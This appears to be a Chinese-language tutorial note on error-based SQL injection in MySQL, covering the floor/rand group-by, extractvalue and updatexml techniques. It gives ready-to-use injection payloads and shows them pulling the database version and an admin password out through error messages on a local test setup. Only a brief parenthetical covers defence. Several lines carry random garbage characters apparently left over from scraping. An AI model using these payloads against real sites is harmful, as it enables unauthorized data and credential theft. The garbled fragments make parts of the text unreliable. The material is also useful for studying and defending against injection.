放点原来的笔记。MySQL 在执行语句出错时会抛出异常信息,而 PHP+MySQL 架构的网站往往又把数据库错误信息直接显示在页面上,这样就可以通过构造下面三种报错语句获取特定数据。(从防御角度看,这三种方法都依赖于数据库错误被原样回显给客户端:生产环境关闭 display_errors、不向用户展示数据库错误,并对 SQL 参数使用预编译/绑定变量,即可同时消除注入点和报错回显通道。)
实际测试环境:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过 floor 报错
可以使用如下利用代码。原理:count(*)、group by 与 floor(rand(0)*2) 组合时,rand(0) 的伪随机序列会让同一个分组 key 被重复写入临时表,从而触发 Duplicate entry 错误,而错误信息中恰好带出了被 concat 拼接进 key 的数据:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

(第二种写法不依赖 information_schema,而是用 union 自行构造了一个三行的派生表;这种 rand(0) 报错需要被 group by 的结果集有足够多的行(至少 3 行)才能稳定触发,这也是这里刻意拼出三行的原因。)
举例如下,首先进行正常查询:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如 id 参数存在注入的话,可以通过如下语句触发报错:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
: e# P) [3 [2 h) ?; Q可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* k2 M/ o; t/ Z& b, a2 O
例如我们需要查询管理员的用户名和密码:

Method1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下。0x5c 即反斜杠 "\",它不是合法的 XPath 表达式开头,extractvalue() 解析失败时会把整个表达式(连同其中拼接进来的查询结果)放进错误信息里回显:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

注意:XPATH 报错回显的内容长度有限(一般只有 32 个字符),较长的字段需要配合 substr() 分段读取;extractvalue()/updatexml() 是 MySQL 5.1.5 之后才有的函数,更低版本只能用上面的 floor 报错。
3、UpdateXml
7 g# ~' d% S v' _; |: }. i: w% [测试语句
, F8 Z7 V9 S0 ]
, Z( K) d$ z! f0 ]8 m
: y) V% u; A; T4 w9 Q$ T0 c9 B; o+ cand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.